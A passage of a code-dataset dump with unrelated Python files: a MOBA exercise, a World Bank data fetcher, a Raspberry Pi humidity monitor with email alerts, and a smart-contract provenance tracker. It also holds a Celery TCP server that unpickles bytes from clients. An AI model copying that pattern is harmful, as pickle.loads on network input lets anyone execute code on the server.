presentation\n html = md2html.compile_markdown(note.content)\n content = templ.render(html=html)\n\n # save it\n with open(os.path.join(outdir, note.title) + '.html', 'w') as out:\n 
out.write(content)\n","repo_name":"frnsys/nomadic","sub_path":"nomadic/util/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"24134584320","text":"def player_existence(dct, name):\n    if name in dct:\n        return True\n    return False\n\n\ndef add_position_to_player(dct_players, total_points, name, position, skill):\n    if not player_existence(dct_players, name):\n        dct_players[name] = {position: skill}\n        total_points[name] = skill\n    else:\n        if position in dct_players[name]:\n            if dct_players[name][position] < skill:\n                # compute the gain before overwriting the old skill value,\n                # otherwise the difference is always zero\n                diff = skill - dct_players[name][position]\n                dct_players[name][position] = skill\n                total_points[name] += diff\n        else:\n            dct_players[name][position] = skill\n            total_points[name] += skill\n    return dct_players, total_points\n\n\ndef battle(dct_players, total_points, player1, player2):\n    common_position = False\n    if player_existence(dct_players, player1) and player_existence(dct_players, player2):\n        for position in dct_players[player1]:\n            if position in dct_players[player2]:\n                common_position = True\n                break\n        if common_position:\n            if total_points[player1] > total_points[player2]:\n                del dct_players[player2]\n                del total_points[player2]\n            elif total_points[player2] > total_points[player1]:\n                del dct_players[player1]\n                del total_points[player1]\n    return dct_players, total_points\n\n\nmoba_players = {}\ntotal_skill_points = {}\ncommand = input()\nwhile not command == \"Season end\":\n    if \" -> \" in command:\n        player, position, skill = command.split(\" -> \")\n        skill = int(skill)\n        moba_players, total_skill_points = add_position_to_player(moba_players, total_skill_points, player, position, skill)\n    elif \" vs \" in command:\n        first_player, second_player = command.split(\" vs \")\n        moba_players, total_skill_points = battle(moba_players, total_skill_points, first_player, second_player)\n    command = input()\n\ntotal_skill_points_sorted = dict(sorted(total_skill_points.items(), key=lambda kv: (-kv[1], kv[0])))\n\nfor name, number in total_skill_points_sorted.items():\n    print(f\"{name}: {number} skill\")\n    [print(f\"- {x} <::> {y}\") for x, y in sorted(moba_players[name].items(), key=lambda kv: (-kv[1], kv[0]))]\n","repo_name":"1van101/SoftUni-Software-Engineering","sub_path":"python_fundamentals/more_exercises/06_dictionaries_more_exercises/moba_challenger.py","file_name":"moba_challenger.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36036298267","text":"import requests\nfrom collections import defaultdict\n\ndef request_wb_data(indicator):\n    # gdp -> NY.GDP.MKTP.CD\n    url_base = 'http://api.worldbank.org/v2/countries/cn;us/indicators/' + indicator\n    params = {'format': 'json', 'per_page': '500', 'date': '2000:2017'}\n    try:\n        data = requests.get(url_base, params=params)\n    except:\n        data = None\n    return data\n\ndef clean_json_data(request):\n    data = defaultdict(list)\n    for entry in request.json()[1]:\n        # check if country is already in dictionary. 
If so, append the new x and y values to the lists\n # if country not in dictionary, then initialize the lists that will hold the x and y values\n if not data[entry['country']['value']]:\n data[entry['country']['value']] = [[], []]\n data[entry['country']['value']][0].append(int(entry['date']))\n data[entry['country']['value']][1].append(float(entry['value']))\n return data\n","repo_name":"krisbitney/interactive_dashboard","sub_path":"scripts/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39500781548","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport Adafruit_DHT\nimport RPi.GPIO as GPIO\nimport time\nimport smtplib\nimport logging\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(13, GPIO.OUT)\nGPIO.output(13,True)\n\nmail_sent_temp = 0\nmail_sent_hum = 0\n\n#Sends email to my address.\ndef send_email(subject, body):\n\tsmtp_user = \"\"\n\tsmpt_pass = \"\"\n\t\n\tto_add = \"anton.gustafsson@protonmail.com\"\n\tfrom_add = smtp_user\n\t\n\theader = \"To: \" + to_add + '\\n' + \"From: \" + from_add + '\\n' + subject\n\t\n\ts = smtplib.SMTP(\"smtp.gmail.com\",587)\n\ts.ehlo()\n\ts.starttls()\n\ts.ehlo()\n\t \n\ts.login(smtp_user, smpt_pass)\n\ts.sendmail(from_add, to_add, header + '\\n' + body)\n\t \n\ts.quit()\n\t#logging_monitoring(\"Email sent to admin\")\n\n#Prints and logg messages\ndef logging_monitoring(message, temp, hum):\n\tcurrent_time = time.strftime(\"%H:%M:%S\")\n\tcurrent_date = time.strftime(\"%d/%m/%Y\")\n\tmessage = \"%s %s: %s \" % (current_date, current_time, message)\n\tlogging.basicConfig(filename='humid.log',level=logging.INFO, format='%(message)s')\n\t\n\tlogging.info('{{\"date\":\"{}\", \"time\":\"{}\",\"temp\":\"{}\", \"humidity\":\"{}\" }},'.format(current_date, current_time, temp , hum))\n\tprint (message)\n\t\n#Checks temperatures if no mail has been sent within 7 hours\ndef check_temperature(temperature, mail_sent_temp):\n\tif(mail_sent_temp == 0):\n\t\tif temperature <= 10:\n\t\t\tsend_email(\"Cold\",\"Temperature is now 10 or less degrees celcius, your flowers aren't happy\")\n\t\t\tmail_sent_temp = 6\n\t\telif(temperature>=32):\n\t\t\tsend_email(\"Hot\", \"Temperature is now 32 or more degrees celcius, your flowers aren't happy\")\n\t\t\tmail_sent_temp = 6\n\t\telif(temperature>=42):\n\t\t\tsend_email(\"Hotter than hell\", \"Temperature is now 45 or more degrees celcius, your flowers are dying!\")\n\t\t\tmail_sent_temp = 6\n\t\t\n\treturn mail_sent_temp\n\n#Checks humidity if no mail has been sent within 7 hours\ndef check_humidity(humidity, mail_sent_hum):\n\tif mail_sent_hum == 0:\n\t\tif humidity < 65:\n\t\t\tsend_email(\"Thirsty\",\"Tomatoes need water\")\n\t\t\tmail_sent_hum = 6\t\n\treturn mail_sent_hum\n\t\n#Increases timer if email has been sent\ndef check_timer(mail_sent_temp, mail_sent_hum):\n\tif(mail_sent_temp != 0):\n\t\tmail_sent_temp -= 1\n\t\t\n\tif(mail_sent_hum != 0):\n\t\tmail_sent_hum -= 1\n\t\t\n\treturn mail_sent_temp, mail_sent_hum\n\t\n#logging_monitoring(\"Starting\")\n#Monitors temperature and humidity\ntry: \n\twhile True:\n\t\thumidity, temperature = Adafruit_DHT.read_retry(11, 4)\n\t\tdata_string = 'Temp: {0:0.1f} C Humidity: {1:0.1f} %'.format(temperature, humidity)\n\t\tlogging_monitoring(data_string, temperature, humidity)\n\t\tmail_sent_temp = check_temperature(temperature, mail_sent_temp)\n\t\tmail_sent_hum = check_humidity(humidity, mail_sent_hum)\n\t\tmail_sent_temp, 
mail_sent_hum = check_timer(mail_sent_temp, mail_sent_hum)\n\t\ttime.sleep(3600) \n\t\t\nexcept KeyboardInterrupt: \t\n\tGPIO.output(13,False)\t\n\t#logging_monitoring(\"Service exited\")\n \nfinally: \n    GPIO.cleanup() # this ensures a clean exit \n\t","repo_name":"antgustech/Raspbi-humid-monitor","sub_path":"humid.py","file_name":"humid.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23308157222","text":"from os.path import expanduser\n\n\nTOP_PROFILE_FOLDER = expanduser('~') + '/.mozilla/firefox/'\nPROFILE_REGEX = r'\\w{8}\\.'\nUSERCHROME_FOLDER = 'chrome'\nUSERCHROME_FILE = 'userChrome.css'\n\nUCM_HEADER = '/* Start UCM section. Do not edit. */\\n'\nUCM_FOOTER = '/* End UCM section. */\\n'\nIMPORT_REGEX = '@import url\\(\"(.*?\\.css)\"\\);'\nNAMESPACE_LINE = '@namespace url(\"http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul\");\\n'\n","repo_name":"crysterbater/doots","sub_path":"home-configs/bin/userchrome'/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"28704431642","text":"import socketserver\r\nimport argparse\r\nimport pickle\r\nimport threading\r\n\r\nfrom operaciones import *\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-p\", \"--puerto\", dest = \"puerto\", type=int)\r\nparser.add_argument(\"-H\", \"--host\")  # \"-h\" is reserved by argparse for the built-in help flag\r\nargs = parser.parse_args()\r\nHOST=args.host\r\nPUERTO=args.puerto\r\nHEADER=1024\r\n\r\nclass TCPHandler(socketserver.BaseRequestHandler):\r\n    def handle(self):\r\n        connected = True\r\n        while connected:\r\n            data = self.request.recv(HEADER)\r\n            if not data or data == b\"quit\":  # recv() returns bytes\r\n                break\r\n            msj_loaded = pickle.loads(data)\r\n            if msj_loaded[0] == 'resta':\r\n                resultado=resta.delay(msj_loaded[1],msj_loaded[2])\r\n            elif msj_loaded[0] == 'suma':\r\n                resultado=suma.delay(msj_loaded[1],msj_loaded[2])\r\n            elif msj_loaded[0] == 'mult':\r\n                resultado=mult.delay(msj_loaded[1],msj_loaded[2])\r\n            elif msj_loaded[0] == 'pow':\r\n                resultado=power.delay(msj_loaded[1],msj_loaded[2])\r\n            elif msj_loaded[0] == 'div':\r\n                resultado=division.delay(msj_loaded[1],msj_loaded[2])\r\n            else:\r\n                exit()\r\n            message_send = pickle.dumps(resultado.get())\r\n            self.request.sendall(message_send)\r\n\r\n\r\nclass ThreadTCP(socketserver.ThreadingMixIn, socketserver.TCPServer):\r\n    pass\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\r\n    msj_loadedServer=((HOST,PUERTO))\r\n\r\n    server = ThreadTCP(msj_loadedServer,TCPHandler)\r\n\r\n    with server:\r\n        host, puerto = server.server_address\r\n        thread = threading.Thread(target=server.serve_forever)\r\n        thread.daemon = True\r\n        thread.start()\r\n\r\n        print(host,puerto)\r\n        server.shutdown() ","repo_name":"stefanoppp/celery","sub_path":"server_celery.py","file_name":"server_celery.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33304059884","text":"import uuid\r\n\r\nfrom web3 import Web3, HTTPProvider\r\n\r\nfrom contract_mapping.contract_mapping import get_contract_address_to_contract_info, get_contract_address_to_contract\r\nfrom souffle.facts_handler import get_all_relations_data, append_query_line_from_dic, load_relation\r\nfrom souffle.parser import get_souffle_query_relations_metadata\r\nfrom utils import read_full_file, get_contract_full_function_parameter_id, get_hash_of_list_items, 
get_max_value, \\\r\n full_function_signature\r\n\r\n\r\ndef get_events_data(contract, fromBlock, toBlock):\r\n # should have just 1 event - 'path'\r\n assert len(contract.events._events) == 1\r\n\r\n events_data = []\r\n for contractEvent in contract.events:\r\n myfilter = contractEvent.createFilter(fromBlock=fromBlock, toBlock=toBlock)\r\n eventlist = myfilter.get_all_entries()\r\n\r\n\r\n\r\n for event in eventlist:\r\n # for arg_name in event[\"args\"]:\r\n # args_names_list.append(arg_name)\r\n\r\n # event_data = {\r\n # 'blockNumber': event[\"blockNumber\"],\r\n # 'transactionIndex': event[\"transactionIndex\"],\r\n # 'logIndex': event[\"logIndex\"],\r\n # 'count': event[\"args\"]['count'],\r\n # 'path_id': event[\"args\"]['path_id'],\r\n # }\r\n\r\n events_data.append(event)\r\n\r\n return events_data\r\n\r\n\r\ndef get_function_name_and_parameters(contract, transaction_input):\r\n function = contract.decode_function_input(transaction_input)\r\n function_attr = function[0]\r\n function_vals = function[1]\r\n function_name = function_attr.abi['name']\r\n f_inputs = function_attr.abi['inputs']\r\n parameters = list()\r\n for p in f_inputs:\r\n p_name = p['name']\r\n p_data = {\r\n 'name': p_name,\r\n 'type': p['type'],\r\n 'val': function_vals[p_name]\r\n }\r\n parameters.append(p_data)\r\n return function_name, parameters\r\n\r\n\r\ndef get_dynamic_sc_call_grouped_by_block_trans(dynamic_sc_call_memory):\r\n grouped_dynamic_sc_call = {}\r\n for dc in dynamic_sc_call_memory.values():\r\n block_id = int(dc['block_id'])\r\n if block_id not in grouped_dynamic_sc_call:\r\n grouped_dynamic_sc_call[block_id] = {}\r\n transaction_id = int(dc['transaction_id'])\r\n if transaction_id not in grouped_dynamic_sc_call[block_id]:\r\n grouped_dynamic_sc_call[block_id][transaction_id] = {}\r\n dynamic_contract_id = dc['dynamic_contract_id']\r\n if dynamic_contract_id not in grouped_dynamic_sc_call[block_id][transaction_id]:\r\n grouped_dynamic_sc_call[block_id][transaction_id][dynamic_contract_id] = list()\r\n grouped_dynamic_sc_call[block_id][transaction_id][dynamic_contract_id].append(dc)\r\n return grouped_dynamic_sc_call\r\n\r\n\r\ndef get_last_dynamic_sc_state_param_written(\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id,\r\n batch_id,\r\n static_contract_state_parameter_id):\r\n\r\n last_written = 'NULL'\r\n batch_id_str = str(batch_id)\r\n key = (batch_id_str, static_contract_state_parameter_id)\r\n if key in dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id:\r\n l = dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id[key]\r\n\r\n if len(l) > 0:\r\n last_written = l[len(l) - 1]\r\n last_written = last_written['dynamic_smart_contract_call_state_parameter_written_id']\r\n return last_written\r\n\r\n\r\n# def get_logs_hash(transaction):\r\n# logs = transaction['logs']\r\n# logs = [v for v in logs]\r\n# logs.sort(key=lambda t: int(t[0]), reverse=False)\r\n# path_ids_list = list()\r\n# visited = set()\r\n# for log in logs:\r\n# log_pos = log[0]\r\n# log_args = log[1]\r\n#\r\n# path_id = log_args['path_id']\r\n# if path_id in visited:\r\n# continue\r\n#\r\n# visited.add(path_id)\r\n# path_ids_list.append(path_id)\r\n# hash_ = get_hash_of_list_items(path_ids_list)\r\n# return hash_\r\n\r\n\r\n# def update_first_read_last_written_states_original(current_read_parameters, current_written_parameters, first_read_states,\r\n# last_write_states):\r\n# intersec = 
current_read_parameters.intersection(current_written_parameters)\r\n# if len(intersec) > 1:\r\n# raise Exception('we support only one state that is both written and read in the same node at most once')\r\n# elif len(intersec) == 1:\r\n# # for example state1 = state1 + var\r\n# for sv in intersec:\r\n# if sv in first_read_states:\r\n# # do nothing, state is read again\r\n# pass\r\n#\r\n# elif sv in last_write_states:\r\n# # state was read after it was written with another value, do nothing\r\n# pass\r\n#\r\n# else:\r\n# # new state read, record it\r\n# first_read_states.add(sv)\r\n# for sv in current_read_parameters:\r\n# if sv in first_read_states:\r\n# # do nothing, state is read again\r\n# pass\r\n#\r\n# elif sv in last_write_states:\r\n# # state was read after it was written with another value, do nothing\r\n# pass\r\n#\r\n# else:\r\n# # new state read, record it\r\n# first_read_states.add(sv)\r\n# for sv in current_written_parameters:\r\n# if sv in first_read_states:\r\n# # state was written after it was read, record it\r\n# last_write_states.add(sv)\r\n#\r\n# elif sv in last_write_states:\r\n# # state was rewritten do nothing\r\n# pass\r\n#\r\n# else:\r\n# # new state write, record it\r\n# last_write_states.add(sv)\r\n#\r\n\r\n\r\ndef update_first_read_last_written_states(current_read_parameters, current_written_parameters, first_read_states,\r\n last_write_states):\r\n # intersec = current_read_parameters.intersection(current_written_parameters)\r\n # if len(intersec) > 1:\r\n # raise Exception('we support only one state that is both written and read in the same node at most once')\r\n # elif len(intersec) == 1:\r\n # # for example state1 = state1 + var\r\n # for sv in intersec:\r\n # if sv in first_read_states:\r\n # # do nothing, state is read again\r\n # pass\r\n #\r\n # elif sv in last_write_states:\r\n # # state was read after it was written with another value, do nothing\r\n # pass\r\n #\r\n # else:\r\n # # new state read, record it\r\n # first_read_states.add(sv)\r\n\r\n for sv in current_read_parameters:\r\n if sv in first_read_states:\r\n # do nothing, state is read again\r\n pass\r\n\r\n elif sv in last_write_states:\r\n # state was read after it was written with another value, do nothing\r\n pass\r\n\r\n else:\r\n # new state read, record it\r\n first_read_states.add(sv)\r\n for sv in current_written_parameters:\r\n if sv in first_read_states:\r\n # state was written after it was read, record it\r\n last_write_states.add(sv)\r\n\r\n elif sv in last_write_states:\r\n # state was rewritten do nothing\r\n pass\r\n\r\n else:\r\n # new state write, record it\r\n last_write_states.add(sv)\r\n\r\n\r\n\r\nclass ProvenanceProcessor:\r\n def __init__(self):\r\n\r\n self.data_dir_path = \"/home/slinoy/Downloads/Simple_contract/data/\"\r\n\r\n self.facts_dir_path = \"/home/slinoy/Downloads/Simple_contract/data/facts/\"\r\n self.souffle_query_file_path = '/home/slinoy/Downloads/Simple_contract/souffle/query.dl'\r\n\r\n # self.socialite_dir_path = \"/home/slinoy/Downloads/Simple_contract/socialite/\"\r\n # self.socialite_str_symbol = \"`\"\r\n\r\n file_data = read_full_file(self.souffle_query_file_path)\r\n\r\n self.souffle_query_relations_metadata = get_souffle_query_relations_metadata(file_data)\r\n\r\n self.contract_address_to_contract_info = get_contract_address_to_contract_info(self.data_dir_path)\r\n\r\n self.relations_data = get_all_relations_data(self.souffle_query_relations_metadata, self.facts_dir_path)\r\n\r\n # self.inject_dynamic_dummies()\r\n # return\r\n\r\n self.w3 = 
Web3(HTTPProvider(\"http://127.0.0.1:7545\"))\r\n\r\n self.contracts = self.get_contracts()\r\n\r\n self.path_counter_contract = self.get_path_counter_contract()\r\n\r\n # the following line was supposed to help in mapping a transaction used to deploy a contract\r\n # to the deployed contract address. Important: multiple instances of the same contract are not\r\n # supported since Truffle and Ganache don't support them!!!\r\n self.txhash_to_deployed_contract_address = self.get_txhash_to_deployed_contract_address()\r\n\r\n self.contract_address_to_contract = get_contract_address_to_contract(self.contracts)\r\n self.w3.eth.defaultAccount = self.w3.eth.accounts[0]\r\n\r\n self.static_path_first_read_last_written_state_parameter_memory = self.get_static_path_first_read_last_written_state_parameter_memory()\r\n self.static_contract_state_parameter_memory = self.get_static_contract_state_parameter_memory()\r\n\r\n self.dynamic_contract_memory = self.get_dynamic_contract_memory()\r\n self.dynamic_sc_call_memory = self.get_dynamic_sc_call_memory()\r\n self.dynamic_sc_call_state_parameter_written_memory = self.get_dynamic_sc_call_state_parameter_written_memory()\r\n\r\n def get_txhash_to_deployed_contract_address(self):\r\n txhash_to_deployed_contract_address = {}\r\n for item in self.contract_address_to_contract_info.items():\r\n contract_name = item[1]['contract_name']\r\n if contract_name == 'PathCounter':\r\n continue\r\n\r\n contract_address = item[0]\r\n txhash = None\r\n\r\n for i in item[1]['networks'].items():\r\n txhash = i[1][\"transactionHash\"]\r\n break\r\n assert txhash is not None\r\n\r\n txhash_to_deployed_contract_address[txhash] = contract_address\r\n return txhash_to_deployed_contract_address\r\n\r\n def get_path_counter_contract(self):\r\n path_counter_contract = None\r\n for item in self.contract_address_to_contract_info.items():\r\n contract_name = item[1]['contract_name']\r\n if contract_name == 'PathCounter':\r\n contract_address = item[0]\r\n path_counter_contract = self.get_contract(contract_address)\r\n break\r\n assert path_counter_contract is not None\r\n return path_counter_contract\r\n\r\n def get_contracts(self):\r\n contracts = {}\r\n for item in self.contract_address_to_contract_info.items():\r\n contract_name = item[1]['contract_name']\r\n if contract_name == 'PathCounter':\r\n continue\r\n\r\n contract_address = item[0]\r\n contracts[contract_address] = self.get_contract(contract_address)\r\n\r\n return contracts\r\n\r\n def run(self):\r\n\r\n # static_contract_state_parameter_grouped_by_contract_id = {}\r\n # for static_contract_state_parameter in self.static_contract_state_parameter_memory.values():\r\n # contract_id = static_contract_state_parameter['static_contract_id']\r\n # if contract_id not in static_contract_state_parameter_grouped_by_contract_id:\r\n # static_contract_state_parameter_grouped_by_contract_id[contract_id] = list()\r\n # static_contract_state_parameter_grouped_by_contract_id[contract_id].append(static_contract_state_parameter)\r\n\r\n # for c_item in self.contracts.items():\r\n # contract_id = c_item[0]\r\n # contract_address = c_item[1].address\r\n #\r\n # contract_found = False\r\n # for dynamic_contract_id in self.dynamic_contract_memory:\r\n # if dynamic_contract_id == contract_id:\r\n # contract_found = True\r\n #\r\n # if not contract_found:\r\n # # all deployed contracts need to be written to the dynamic_contract relation\r\n # self.process_dynamic_contract(contract_id, contract_address)\r\n\r\n # Important: multiple instances of 
the same contract are not supported since Truffle\r\n # and Ganache don't support them!!!\r\n # Because of this, in these environments, there is no way to connect the transaction that\r\n # deploys a contract to its deployed contract address. So no contract creation info is collected\r\n #self.process_init_contract_state_parameters_values(contract_id, static_contract_state_parameter_grouped_by_contract_id)\r\n\r\n self.process()\r\n\r\n # tx_hash = client_contract.functions.withdraw(100).transact()\r\n # w3.eth.waitForTransactionReceipt(tx_hash)\r\n\r\n # todo - the premise is that this process function should be run after each single transaction has finished\r\n # processing on the miner side. this is due to us querying the state values of the relevant contract from the\r\n # contract itself after its execution. reading these state values after a different transaction has run can result\r\n # in overriding the previous state values\r\n def process(self):\r\n\r\n dynamic_sc_call_grouped_by_block_trans = get_dynamic_sc_call_grouped_by_block_trans(self.dynamic_sc_call_memory)\r\n grouped_events_data = self.get_current_grouped_events_data(dynamic_sc_call_grouped_by_block_trans, self.path_counter_contract)\r\n\r\n block_numbers = grouped_events_data.keys()\r\n block_numbers = [v for v in block_numbers]\r\n block_numbers.sort(key=lambda t: int(t), reverse=False)\r\n for block_id in block_numbers:\r\n transaction_ids = grouped_events_data[block_id].keys()\r\n transaction_ids = [v for v in transaction_ids]\r\n transaction_ids.sort(key=lambda t: int(t), reverse=False)\r\n for transaction_id in transaction_ids:\r\n dynamic_sc_call_id = uuid.uuid4()\r\n transaction = grouped_events_data[block_id][transaction_id]\r\n\r\n transaction_to = transaction['transaction'].to\r\n transaction_from = transaction['transaction']['from']\r\n contract_address = None\r\n\r\n # Important: multiple instances of the same contract are not supported since Truffle\r\n # and Ganache don't support them!!!\r\n # Because of this, in these environments, there is no way to connect the transaction that\r\n # deploys a contract to its deployed contract address. 
So no contract creation info is collected\r\n if transaction_to is None:\r\n # created contract address is in the from field\r\n contract_address = transaction_from\r\n else:\r\n contract_address = transaction_to\r\n\r\n if contract_address not in self.contract_address_to_contract_info:\r\n continue\r\n\r\n f_name = f'get_batch_id'\r\n contract = self.contracts[contract_address]\r\n m = getattr(contract.functions, f_name)\r\n batch_id = m().call()\r\n\r\n if contract_address not in self.dynamic_contract_memory:\r\n contract_name = self.contract_address_to_contract_info[contract_address]['contract_name']\r\n # all deployed contracts need to be written to the dynamic_contract relation\r\n self.process_dynamic_contract(batch_id, contract_name, contract_address)\r\n assert contract_address in self.dynamic_contract_memory\r\n\r\n self.process_dynamic_sc_call(dynamic_sc_call_id, block_id, transaction_id, transaction)\r\n self.process_dynamic_path(dynamic_sc_call_id, transaction)\r\n self.process_dynamic_sc_function_call_parameter(dynamic_sc_call_id, transaction)\r\n\r\n first_read_states, last_write_states = self.get_transaction_first_read_last_write_state_ids(batch_id, transaction)\r\n\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id = \\\r\n self.get_dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id()\r\n\r\n rel_name = 'dynamic_smart_contract_call_state_parameter_read'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n for static_contract_state_parameter_id in first_read_states:\r\n #static_contract_state_parameter_id = read_parameter['static_contract_state_parameter_id']\r\n last_written = get_last_dynamic_sc_state_param_written(\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id,\r\n batch_id,\r\n static_contract_state_parameter_id)\r\n\r\n d = {\r\n 'dynamic_smart_contract_call_id': str(dynamic_sc_call_id),\r\n 'static_contract_state_parameter_id': static_contract_state_parameter_id,\r\n 'dynamic_smart_contract_call_state_parameter_written': last_written,\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n\r\n rel_name = 'dynamic_smart_contract_call_state_parameter_written'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n for static_contract_state_parameter_id in last_write_states:\r\n dynamic_smart_contract_call_state_parameter_written_id = uuid.uuid4()\r\n #static_contract_state_parameter_id = written_parameter['static_contract_state_parameter_id']\r\n last_written = get_last_dynamic_sc_state_param_written(\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id,\r\n batch_id,\r\n static_contract_state_parameter_id)\r\n\r\n batch_id_str = str(batch_id)\r\n key = (batch_id_str, static_contract_state_parameter_id)\r\n static_contract_state_parameter = self.static_contract_state_parameter_memory[key]\r\n\r\n parameter_name = static_contract_state_parameter['name']\r\n f_name = f'get_state_{parameter_name}'\r\n\r\n #contract_id = static_contract_state_parameter['static_contract_id']\r\n #contract = self.contracts[contract_id]\r\n contract = self.contracts[contract_address]\r\n\r\n m = getattr(contract.functions, f_name)\r\n new_written = m().call()\r\n\r\n d = {\r\n 'dynamic_smart_contract_call_state_parameter_written_id': 
str(dynamic_smart_contract_call_state_parameter_written_id),\r\n 'dynamic_smart_contract_call_id': str(dynamic_sc_call_id),\r\n 'static_contract_state_parameter_id': static_contract_state_parameter_id,\r\n 'value': str(new_written),\r\n 'prev_dynamic_smart_contract_call_state_parameter_written': last_written,\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n self.dynamic_sc_call_state_parameter_written_memory = self.get_dynamic_sc_call_state_parameter_written_memory()\r\n\r\n def inject_dynamic_dummies(self):\r\n sc_call = self.relations_data['dynamic_smart_contract_call']\r\n # get last contract call\r\n last_sc_call = sc_call[len(sc_call) - 1]\r\n prev_sc_call_id = last_sc_call['smart_contract_call_id']\r\n\r\n path = self.relations_data['dynamic_path']\r\n prev_sc_call_paths = [p for p in path if\r\n p['dynamic_smart_contract_call_id'] == prev_sc_call_id]\r\n\r\n sc_state_param_written = self.relations_data['dynamic_smart_contract_call_state_parameter_written']\r\n prev_sc_state_param_written = [p for p in sc_state_param_written if\r\n p['dynamic_smart_contract_call_id'] == prev_sc_call_id]\r\n suffix = \"_20M.facts\"\r\n for i in range(0, 20000000):\r\n\r\n current_sc_call_id = str(uuid.uuid4())\r\n # d = {\r\n # 'smart_contract_call_id': current_sc_call_id,\r\n # 'dynamic_contract_id': last_sc_call['dynamic_contract_id'],\r\n # 'block_id': last_sc_call['block_id'],\r\n # 'transaction_id': last_sc_call['transaction_id'],\r\n # 'caller_address': last_sc_call['caller_address'],\r\n # 'ether_start': 'not_yet_supported',\r\n # 'ether_end': 'not_yet_supported',\r\n # 'static_function_id': last_sc_call['static_function_id'],\r\n # }\r\n # rel_name = 'dynamic_smart_contract_call'\r\n # facts_file_path = self.facts_dir_path + rel_name + suffix\r\n # append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n #\r\n # continue\r\n #\r\n # current_sc_call_paths = list()\r\n # for p in prev_sc_call_paths:\r\n # d = {\r\n # 'dynamic_smart_contract_call_id': current_sc_call_id,\r\n # 'static_path_id': p['static_path_id'],\r\n # 'order': p['order'],\r\n # 'path_count': p['path_count'],\r\n # }\r\n # rel_name = 'dynamic_path'\r\n # facts_file_path = self.facts_dir_path + rel_name + suffix\r\n # append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n # current_sc_call_paths.append(d)\r\n # prev_sc_call_paths = current_sc_call_paths\r\n\r\n current_sc_state_param_written = list()\r\n for p in prev_sc_state_param_written:\r\n\r\n d = {\r\n 'dynamic_smart_contract_call_state_parameter_written_id': str(uuid.uuid4()),\r\n 'dynamic_smart_contract_call_id': current_sc_call_id,\r\n 'static_contract_state_parameter_id': p['static_contract_state_parameter_id'],\r\n 'value': p['value'],\r\n 'prev_dynamic_smart_contract_call_state_parameter_written': p['dynamic_smart_contract_call_state_parameter_written_id'],\r\n }\r\n rel_name = 'dynamic_smart_contract_call_state_parameter_written'\r\n facts_file_path = self.facts_dir_path + rel_name + suffix\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n current_sc_state_param_written.append(d)\r\n prev_sc_state_param_written = current_sc_state_param_written\r\n\r\n\r\n def get_transaction_first_read_last_write_state_ids(self, batch_id, transaction):\r\n # hash_ = 
str(get_logs_hash(transaction))\r\n\r\n logs = transaction['logs']\r\n logs = [v for v in logs]\r\n logs.sort(key=lambda t: int(t[0]), reverse=False)\r\n # path_ids_list = list()\r\n first_read_states = set()\r\n last_write_states = set()\r\n for log in logs:\r\n log_pos = log[0]\r\n log_args = log[1]\r\n path_id = log_args['path_id']\r\n\r\n path_id_str = str(path_id)\r\n batch_id_str = str(batch_id)\r\n key = (batch_id_str, path_id_str)\r\n if key not in self.static_path_first_read_last_written_state_parameter_memory:\r\n continue\r\n\r\n current_read_parameters = [p['static_contract_state_parameter_id'] for p in\r\n self.static_path_first_read_last_written_state_parameter_memory[key]\r\n if p['first_read_or_last_written'] == 'first_read']\r\n current_read_parameters = set(current_read_parameters)\r\n\r\n current_written_parameters = [p['static_contract_state_parameter_id'] for p in\r\n self.static_path_first_read_last_written_state_parameter_memory[key]\r\n if p['first_read_or_last_written'] == 'last_written']\r\n current_written_parameters = set(current_written_parameters)\r\n\r\n update_first_read_last_written_states(current_read_parameters, current_written_parameters,\r\n first_read_states,\r\n last_write_states)\r\n\r\n # read_parameters = [p for p in self.static_path_first_read_last_written_state_parameter_memory[hash_]\r\n # if p['first_read_or_last_written'] == 'first_read']\r\n # written_parameters = [p for p in self.static_path_first_read_last_written_state_parameter_memory[hash_]\r\n # if p['first_read_or_last_written'] == 'last_written']\r\n # important! do this before the written parameters so in the case a written value was also read, we don't\r\n # point to it but point to the past transaction written value\r\n\r\n return first_read_states, last_write_states\r\n\r\n def get_dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id(self):\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id = 